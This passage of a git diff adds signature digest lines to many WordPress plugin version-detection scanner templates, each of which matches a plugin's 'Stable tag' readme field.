4b0a00483046022100aa04f21c9e18a99aaee75511755c88dc7cf409c6e5f585305e8d08e670b35fe90221009555c94d0549820ab201bbf8b5822d28f13d1566e05a730ba3a53ef850b3b658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..589b07b884 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502210099c33d298a05281f01badf87943883ebac8df6e862c2f192aca3f9f943f18c4b02206629a39c5978d4f45fb98a17b0e87d2d26da4a01514efc5d26fd4cc8a019f244:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..8de80f4ab9 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100f522cb95db2a3f3c8a01d82b189e42baa9db66e6f48be48e1246a10dc451390102203261d238c67fcc206b4533a82ae07ee88cc8c60d148780be9408bfa6467a6155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..dc04d1b8ea 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100f6a81c87840aec92d8afe3bb7b18fd4934f34e113ecfe47da746025bd88003eb022100938d47162e040a8474ff77188526bcaf054bc149c03336deafe67e0082107721:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..7e4594414c 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022005674bda0a0ef266315919abe290189851cbc35d45848aee157aec93ab54210b02203c285105872a5d8506b0a77799e15eaed4b5760335fd03d56a323e7d3fd14b8c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index f8691caf0a..82396896e7 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402203f363a21356dcf607e08f6f92faf13e95f7b2239a5953cc380845f491835c7a802206eaba11ac6ecce9da6931f87538a6456baaa6e0928399863c28dabfa2f965f39:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..8fe1943684 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402206dc1c2729da96e43deee9e49ac474a0016d559ed6fe2b0139bb98ee076e27320022001d161375f91e171f85b7369c567412fe7ac844c524aceb94c8e1203e9dc9f93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..a12a57a088 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200aed1c9f41cd28681f24f6b69547a8326438654f08090c614cdb51b5f23bcc12022100bbaad455741de721a6a1d7e97399ce9a536b520e96e3bff92ba0a7d7610f9ee3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..d7d7f13b7e 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a00463044022056810a325b2125be237f0b9b184c0e66f093d9a9ab5297dbed00a64fee9b6065022014e9b869de833fdf03bc85614b73756c008388c0f9aef50f4d760dee9609db8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..c2adedb81a 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e32259e204ca0b4130027f777844ca9c0618126e5365cd1dfc93db409e7ce28d022077b6f5c4735da47c0bdebfc7fc41dde137ce3742bcf094df63c29700d32540ae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..a68f7f2c3c 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220054f1411925876147d8b0cdef5d42256faf761961dba46dea37cd52075d4d58602204fcb974b3e3d28f9e2c9a9b4da645c18c0e43d759e1236ff655d977c27472d16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..7096a56742 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100c197ed46a95d1df8a5dbb23f5e7d0079de0ed855d201cc70e8de0ed6bd3e4151022100aeadadd38bbed994bf76a386b70e976f2d741d3b04d27233b0d7cf4b7de12432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..0c7b8e13c8 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a004730450220227c4d1f9637ad2610944ae85d0752de319a20a5cc89668441066158711837df0221009cd22793d4a3ea26a2913f5b7741d0ab1bfd50e0d71e1af13e1431d1ff79fe0a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..a4fe0f4b47 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022018128dce37e285353d5953399f9af443f90ffed2ebf27b5b80739efc51a20403022100b1e820aea138f8124e1a6ce924e00e3e1ec455389cb9a3ae518772a8851c9a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..9b41282ad1 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022065990e08754d834b2974fa3cc73fe266b5f5be84d6eca2b3335ce846afa0bfde022100e7d8f41e8eb6fb2f2da955ad8a105a8eb03e63e6637d15dbd083930a61f50f40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..31797f3e56 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100a9845ebf44f1e6900ebfd999f8fab3f0bb380489cd16a6dbc0b9e345cc2f36f4022100b30bbcaa49a051eafdb3d42bd99fc42231f74751e08acbbf9a3aa5c6f0b8bb4d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index e13909fff3..f05456d4a0 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a004630440220503b03426ec1397a9ed90c5faedaf0e407e59654bae91c95361cd2f53c7c113e0220313ce8255f700d591c6d3600a8779fbc961ca8f66421d2b3b128703bd9b75dc7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..391db3b32c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008f947d27f4cacb26ebf12ab66b4e320cfe1176540cdc4bba8fc182431dca5b7a022100d9f96ac7e41ce65cc5defb23c563afe6839954caf111dd924e858210ce0d299d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..87fdd9131a 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100ad341175182ceeb69bb332cbf2595544b48c5928177e2d3312004e5f8f920bb8022035cdefe706b9cb1663b8826be1fe679da8e1d95eaf7f1905748300f0d00f3748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..1c7fa24eab 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402205b28c9184e170f2001abce96cb9d2da30bb7fe895a4ccbff8e13d10a9b7cdb270220356b210662f24b14cb50786dadfffc21dbe58eb65fd7c83afbca061d04803509:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..769a22466e 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b6c04234b9d5ccb286c7b44471d85edd74e8a7f1ad021f241e148eb259dd5b2c022064154c7b24ebfe842b53ac2e159557500ebcf4ad2b5a7faf6694362ce6faeb2c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..d42562cee4 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100930ffd7dfdb426e23e86b7c0349fab8f21255d23b2c43b229b5326bda825b3320221009399c507b688b5a4451dbabc6fbf3a8b5c97490322d7b15f9417e3f7f70db223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..67388d87b8 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206bf3986464eed4c6cffb94ab5292987b763dc0fd53a6bcd94e82c5899246f47b022100984ca461770b6eb42a184ca0c2604c4f0fd22a7907a83ec1f1714aae2675d0a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..7734a06704 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100cc04c11c42a0265796496b9d36d2b4de3158b46e9a9185919c35f530b6bb47f5022100f8c148009822262ddee9d12f9c4e3a1ab7f9f6d2db90f4db96a844682093f48f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index dafbd25c9e..14e5bf5faa 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022072c1bec865695ea7cf1a02c25f7cb12aafaaba4e641043869a96ab44f53dfff3022100d2cb7c348387f766c9744f53d13560f9490c64d3eb19b9902c0d6f7619495f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..e13bae48aa 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205956ef315521b615f7e870900f7329ad7b14e402678225695a98b2bacd242bfc022100eccf5cf5ecb34eafca42f9d2d61c7dc9a8a4f5b0dd9ed040ca35317a88b67f54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..f688f54cba 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402207a352c4c2a22a01dcc746995a72a877454a165846cbf0508daaaddf5a19c41b90220773af37738e0081ab4fd24786f901932791914f786cbba3de0b01f87c81c6bf7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..57011be7e9 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100e542042e67ec74763762f7d2699e01eb25092f19c5053d3daeb2e5f9ed5a16500220180763e3344e884e017ed4a434d66f52b43ecbd6738c32194576761c51ecc210:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..233b630155 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200edd9cd1e97afbb6a09d05ea96af1f33c0c54404a035e093f11f7afc1012f8ea022100c5d284bf2b625a3efa007fdfbaeff7f0fd7ac533909112f6bcffe3d6c8e07c92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..d6e6cb95fc 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022028f202c8b90689ee3490c6ed0c87fd947b27e66597770775c5d4756cf48f9399022100b537f8483ecc3256a039be9a313706fe0193b3db2aeff6f79c6c599c0c634e8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..2443adae65 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022069afb2f0f7eafe9d065b925effbd23f18f67c28531d77bdc3fa20eaa2e21c705022100e302e5facb9d60814a7db0789e0e4b32c7a69c4941f014d9e7552fd457dec0a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..60a0ac054f 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100802c8b8c41d7146bb9b84c6bf6807213d11ddd032c03a3e4c16024847ab7bb9402210085c5a1d42c6ab67aa5d8523cf32a24b5b7dfaaf6d9f1e62e3ad0f04766e6f405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..a881913ee3 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d98ea95d3667d17e7ba84bf261156841f4411c0667d3bf7331631ba2b8ffc3bb022042ff5bb2b0b37a35a48cf92ecc495a604224579c560aa68a2f6fe1022b0380f8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..dddac80856 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100b6d6253af73eff424f28e2d56721adf6ea91e929ee47d27103b7b1506f057b70022100c39de3f6bef7143f646f44a59581553363ecdd3681e307a42d82e9f103d33701:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index fe4c223cba..07132465b4 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a004830460221008616db345f8ea4c263cb17a8aa834ffeaec077c5ffb9def656f0357516c5e8b0022100b88256bf7ab0e8da2fe1307c3fc8527fc36b59dfaa49645d1ded13fd1c7b7672:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..e5019c37ed 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100b2489e2a5b87d170d13cc2fdbf26ab478a04cb5eefd6acfadab75179ef68fe050220245cd1ab6f2ffe1605918d4efddecb0a58d5a2a00d324e8990e60de118c82c6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..7356082f7c 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100dc394d46517aa2162d1b671be27696e472bec6a0208f8ba82d4ea1224c2fc70c022100ca01d5c506c7d5e476bb86b77733f66f47be058d7f3c90db1fcf090cba64ba24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..3731a2a125 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 490a0046304402204aad86decc3d35cf4b65e27c4c664d2b1258b26d475e3df0a41c89625746a37502200629c61ec0739dcc77e53eface1bd7bd5855c7b9d3b26f57b12740687d54b861:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..d39d3cd166 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502205f4ffd621ad8ab4ecc8de245bd3b32d0da059c4022a5c1fb73cd4cf9c7832f9c022100c8332b53b4f2b82d69ea3a4f841f4929eb46c7610956fa9cf3d61b7e555479f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 5ea77f898d..34a0eb814c 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502206c9d421b4c6ce86f1e0e61069e6edc000e7ab34f05d45158744721d697ec7fa8022100818d72ce0426a0dede06d65662fced7eec5c60695f348f036e3a5190f8e17d35:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..4ba98aad47 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a0047304502200abb59e56943bbc46fd785bf5ad8f8289b5974721e8a79f8e4ef82af3e58def50221008403937ef9709da7ec66b463c0215106eb6daf64b67a3de0f43888b4ca7b2085:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/extendify.yaml b/http/technologies/wordpress/plugins/extendify.yaml index 554a7ddc52..b72d7fb490 100644 --- a/http/technologies/wordpress/plugins/extendify.yaml +++ b/http/technologies/wordpress/plugins/extendify.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100d391ebc193aa099602b5a174d8394f05c849a039fb4790fe431797b909e53c4a02201b3c70a0b0a671245872a43434c20506471dfc42f977999f7f4d6fea2c763442:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..dc1eee4570 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022100845d54253cca35c13173091d65f9cd4ed511c7c8d4b0414a2d6febd7b709179a022035b85170c535eef86cb60a08e836e9c0866628ec96404b3f50d135014c6a147b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..4a720f7e59 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022065752bf1629e498c6ad553fdaebba4a2291656b2bc931ecb8c2f49efad470460022100cb3adf99d65fb12b218b25b5dfc66fdfa54e64008c4352d9c220790729327028:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 033cc4bc3d..cb09cff92c 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4a0a00473045022028b262091fed8ad2b6a5da8c1460b00b80ab462851424bf023d77a79c393c7ef022100bce6462031e5429aae5721a6266eedb5fbe29a846b79e263a73b923547461286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 4a3dcbd210..97f7f532b5 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100da2696b69107dccac06bfc42e0fe06a734d787e802d739f2bf6c564fd5f2c9ae022100deb83c973825671129f2e063bd4efc706311aee7fedfb14a64b1a619b7f7456e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 945ab6ad03..661fc60586 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,3 +46,5 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' + +# digest: 4b0a00483046022100abb8576701ef8f155982c2e84136915f490884ee89656d39680a0dc7b8928950022100fcf2371919bb2b8d8a6fb4ffa0ed71db3e265f6d1194118871b452dab05e6855:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 2072b51ab9..5d21e42aa2 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,3 +46,5 @@ http: part: body regex: - 